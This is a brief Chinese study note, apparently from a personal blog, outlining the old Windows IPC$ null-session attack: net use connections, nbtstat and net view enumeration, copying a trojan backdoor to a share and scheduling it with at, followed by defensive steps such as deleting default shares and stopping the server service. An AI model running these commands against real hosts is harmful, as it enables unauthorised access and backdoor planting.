主要都是看這篇文章的http://blog.csdn.net/bytxl/article/details/46790995
這裏自己總結一下,因爲沒有環境實戰,也沒有實戰經驗,所以就理理思路。
首先,
建立空連接
net use \\ip\ipc$ "" /user:""
或者非空連接
net use \\ip\ipc$ "password" /user:"username"
這裏順便講一下刪除連接
net use \\ip\ipc$ /del
當然建立空連接的時候可以通過某些方法得到用戶名和密碼,具體我不會做,只知道這個可以獲得用戶名。
nbtstat -A \\ip
然後查看目標主機上有哪些共享目錄
net view \\ip
接着就是往共享目錄上上傳文件(木馬後門),當然你得有寫入權限,至於權限的獲取我並不會。
copy 要複製的文件及路徑 目的路徑
最後當然是運行這個文件
獲取遠程主機的時間
net time \\ip
用at運行剛纔上傳的文件,運行時間是遠程主機的時間
at \\ip 時間 程序名
好吧at命令似乎不支持了,改天再嘗試。
防護主要從兩個方面,一個是刪除多餘的賬戶,另一個是刪除默認共享。
刪除多餘的賬戶可以參考
http://blog.csdn.net/qq_27607539/article/details/76019992
這個方法。
刪除不必要的共享可以用
net share
查看自己有哪些共享,然後用
net share 共享名 /del
刪除掉,更狠一點的可以直接禁用server服務:
net stop server /f